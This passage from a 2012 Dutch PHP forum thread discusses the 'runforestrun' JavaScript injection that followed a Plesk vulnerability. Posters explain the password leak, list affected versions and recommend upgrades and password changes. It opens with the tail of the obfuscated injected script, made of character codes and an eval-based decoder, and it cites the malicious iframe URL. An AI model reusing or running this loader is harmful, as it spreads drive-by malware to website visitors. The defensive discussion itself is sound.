44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,52,56,53,44,54,53,52,44,53,48,53,44,53,50,50,44,52,56,53,44,54,57,48,44,51,51,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,56,52,44,53,56,53,44,54,48,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,56,53,44,54,54,48,44,53,50,53,44,55,50,48,44,49,54,48,44,51,54,54,44,49,54,48,44,52,54,50,44,52,56,53,44,54,57,54,44,53,50,48,44,50,55,54,44,53,55,48,44,54,54,54,44,53,56,53,44,54,54,48,44,53,48,48,44,50,52,48,44,50,49,53,44,54,54,48,44,53,48,53,44,55,49,52,44,49,54,48,44,52,48,56,44,52,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,50,48,53,44,50,56,50,44,50,52,53,44,50,56,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,56,53,44,54,51,48,44,53,53,48,44,52,54,56,44,52,56,53,44,54,53,52,44,53,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,49,53,44,54,48,54,44,53,53,48,44,54,48,54,44,53,55,48,44,53,56,50,44,53,56,48,44,54,48,54,44,52,48,48,44,54,57,48,44,53,48,53,44,55,48,50,44,53,48,48,44,54,54,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,49,53,44,54,57,54,44,53,55,48,44,54,51,48,44,53,53,48,44,54,49,56,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,54,52,44,49,54,48,44,50,57,52,44,50,55,48,44,50,54,52,44,49,54,48,44,50,51,52,44,53,55,48,44,55,48,50,44,49,57,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,49,54,48,44,51,54,54,44,49,54,48,44,54,48,48,44,53,53,53,44,53,57,52,44,53,56,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,55,54,44,52,57,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,51,52,53,44,54,52,56,44,53,48,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,52,48,44,49,55,48,44,52,51,56,44,51,53,48,44,52,57,50,44,51,50,53,44,52,54,50,44,51,52,53,44,50,48,52,44,50,48,53,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,48,53,44,54,57,54,44,51,50,53,44,54,57,54,44,53,56,48,44,54,56,52,44,53,50,53,44,53,56,56,44,53,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,49,55,48,44,54,57,48,44,53,55,48,44,53,57,52,44,49,55,48,44,50,54,52,44,49,54,48,44,50,48,52,44,53,50,48,44,54,57,54,44,53,56,48,44,54,55,50,44,50,57,48,44,50,56,50,44,50,51,53,44,50,48,52,44,50,49,53,44,54,48,48,44,53,53,53,44,54,53,52,44,52,56,53,44,54,51,48,44,53,53,48,44,52,54,56,44,52,56,53,44,54,53,52,44,53,48,53,44,50,53,56,44,49,55,48,44,50,56,50,44,53,55,48,44,55,48,50,44,53,53,48,44,54,49,50,44,53,53,53,44,54,56,52,44,53,48,53,44,54,57,48,44,53,56,48,44,54,56,52,44,53,56,53,44,54,54,48,44,51,49,53,44,54,57,48,44,53,50,53,44,54,48,48,44,51,48,53,44,53,56,56,44,53,53,53,44,54,57,54,44,53,53,48,44,54,48,54,44,53,56,48,44,51,48,48,44,49,55,48,44,50,52,54,44,50,57,53,44,49,57,50,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,53,52,53,44,50,55,54,44,53,55,53,44,54,57,54,44,54,48,53,44,54,52,56,44,53,48,53,44,50,55,54,44,53,57,53,44,54,51,48,44,53,48,48,44,54,57,54,44,53,50,48,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,50,56,56,44,53,54,48,44,55,50,48,44,49,55,48,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,56,48,44,55,50,54,44,53,52,48,44,54,48,54,44,50,51,48,44,54,50,52,44,53,48,53,44,54,51,48,44,53,49,53,44,54,50,52,44,53,56,48,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,50,56,56,44,53,54,48,44,55,50,48,44,49,55,48,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,56,48,44,55,50,54,44,53,52,48,44,54,48,54,44,50,51,48,44,55,48,56,44,53,50,53,44,54,57,48,44,53,50,53,44,53,56,56,44,53,50,53,44,54,52,56,44,53,50,53,44,54,57,54,44,54,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,54,50,52,44,53,50,53,44,54,48,48,44,53,48,48,44,54,48,54,44,53,53,48,44,50,48,52,44,50,57,53,44,49,57,50,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,48,48,44,53,53,53,44,53,57,52,44,53,56,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,55,54,44,52,57,48,44,54,54,54,44,53,48,48,44,55,50,54,44,50,51,48,44,53,56,50,44,53,54,48,44,54,55,50,44,53,48,53,44,54,54,48,44,53,48,48,44,52,48,50,44,53,50,48,44,54,51,48,44,53,52,48,44,54,48,48,44,50,48,48,44,54,51,48,44,53,49,48,44,54,56,52,44,53,52,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,54,50,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,54,50,53,44,53,57,52,44,52,56,53,44,54,57,54,44,52,57,53,44,54,50,52,44,50,48,48,44,54,48,54,44,50,48,53,44,55,51,56,44,54,50,53,44,54,48,44,54,50,53,44,50,54,52,44,49,54,48,44,51,49,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,93,59,118,61,34,101,118,97,34,59,125,105,102,40,118,41,101,61,119,105,110,100,111,119,91,118,43,34,108,34,93,59,119,61,102,59,115,61,91,93,59,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10));/*qhk6sa6g1c*/</script>
 
PHP hulp

PHP hulp

07/05/2024 01:45:13
 
Q S

Q S

09/07/2012 09:44:51
Quote Anchor link
Ik heb m vorige week ook gehad die website draait op een server die te beheren is met Plesk. Blijkt dat daar een lek in de Filemanager zit.
 
John Cena

John Cena

09/07/2012 09:52:58
Quote Anchor link
Klopt, daar draait Plesk op. Hoe is dat nu tegen te gaan? En, hebben ze nu bij alle wachtwoorden kunnen kijken van API's etc?
 
De VeeWee

de VeeWee

09/07/2012 09:54:24
Quote Anchor link
Dat script zet een iframe op uw website met als link:
http://wakvnkyzkyietkdr.ru/runforestrun?sid=botnet2

Deze domeinnaam is random gegenereeerd door het script en zal dus bij een nslookup dikwijls geen record opleveren, omdat de domeinnaam bijvoorbeeld nog niet geregistreerd is.

Als je die javascript string gewoon output, krijg je dus die runforestrun injectie met een pseudo-random domain. Meer info hier over op:
http://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/

Als je dan naar de comments gaat kijken, dan zie je dat dat inderdaad in Plesk een fout is.

Quote:
To webmasters: If your site is affected by this hack, contact your hosting provider ASAP and show them this post. Change your account passwords. And if your host resets your passwords there is a good reason for that. Don’t change your passwords back to your old ones!


Vooral dit is interessant:
Quote:
Many admins do not realize that their passwords have been spied out weeks or months ago. To make it more clear: Due to the Plesk vulnerability database tables could be read. And unfortunately all Passwords in Plesk are stored in plain text!! Take a look in database ‘psa‘ at table ‘accounts‘ (and better sit down before doing that!). That’s why it is so important to change ALL passwords.


De hacker is dus met al de plain-text wachtwoorden gaan lopen.
Best plex upgraden zodat deze bug niet meer mogelijk is, of uw hosting firma contacteren om dit te doen.
 
John Cena

John Cena

09/07/2012 10:01:00
Quote Anchor link
Hmm, zal mijn hoster dit laten weten.

Is het mogelijk dat de hackz0rs met alle wachtwoorden zijn gaan lopen van API's, databases etc?
 
De VeeWee

de VeeWee

09/07/2012 10:07:27
Quote Anchor link
Volgens wat ik hier over gelezen heb, is dit een fout in plesk. Dit wilt zeggen dat ze dus van alle accounts in plesk de gegevens hebben. Dus van alle websites, managers, ...

Het zou over een sql injection gaan. Normaal worden de mysql wachtwoorden apart opgeslagen. Ik denk dus niet dat ze aan de database van uw website zelf geraken.

Vanaf het moment dat die plesk installatie gekraakt is, hebben ze alle wachtwoorden. Daarna wordt die js geinjecteerd in alle pagina's. Die zorgt er voor dat gebruikers een valse versie van bijvoorbeeld AV wordt aangeboden.

Ik lees echter niets over het bemachtigen van databases van de websites zelf.

Nog meer info over die runforestrun:
https://isc.sans.edu/diary/Run+Forest+Update+/13561

Misschien toch best op zeker spelen en deze wijzigen?
Gewijzigd op 09/07/2012 10:09:10 door de VeeWee
 
John Cena

John Cena

09/07/2012 10:12:16
Quote Anchor link
Wachtwoorden van SQL staan in een bestand op de server zelf, daar zijn ze dan waarschijnlijk ook bij geweest?
 
Elwin - Fratsloos

Elwin - Fratsloos

09/07/2012 10:16:42
Quote Anchor link
Over welke versie van Plesk gaat dit?
 
De VeeWee

de VeeWee

09/07/2012 10:19:30
Quote Anchor link
http://kb.parallels.com/en/113321:

Plesk 7.5.x Reloaded
Plesk 7.1.x Reloaded
Plesk 7.0.x
Parallels Plesk Panel 9.x for Linux/Unix
Parallels Plesk Panel 8.x for Linux/Unix
Plesk 7.x for Windows
Parallels Plesk Panel 9.x for Windows
Parallels Plesk Panel 8.x for Windows
Parallels Plesk Panel 10.3 for Windows
Parallels Plesk Panel 10.2 for Windows
Parallels Plesk Panel 10.1 for Windows
Parallels Plesk Panel 10.0.x for Windows
Parallels Plesk Panel 10.3 for Linux/Unix
Parallels Plesk Panel 10.2 for Linux/Unix
Parallels Plesk Panel 10.1 for Linux/Unix
Parallels Plesk Panel 10.0.x for Linux/Unix

Volgens mij zijn ze niet naar die mysql op zoek gegaan. Het is natuurlijk mogelijk.
Het zou over de plesk gebruikers/websites gaan en hun ftp records.
Misschien kan je deze toch best aanpassen om zeker te zijn?
 
Elwin - Fratsloos

Elwin - Fratsloos

09/07/2012 10:32:04
Quote Anchor link
Thx voor de link. :)
Vannacht met een van de servers naar 10.4.4 geüpgrade. De anderen toch ook maar z.s.m. :)
 
De VeeWee

de VeeWee

09/07/2012 10:34:05
Quote Anchor link
In versie 11, die nog maar net uit is, staan de wachtwoorden eindelijk geëncrypteerd. Misschien even overwegen om direct naar de 11 te upgraden?
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.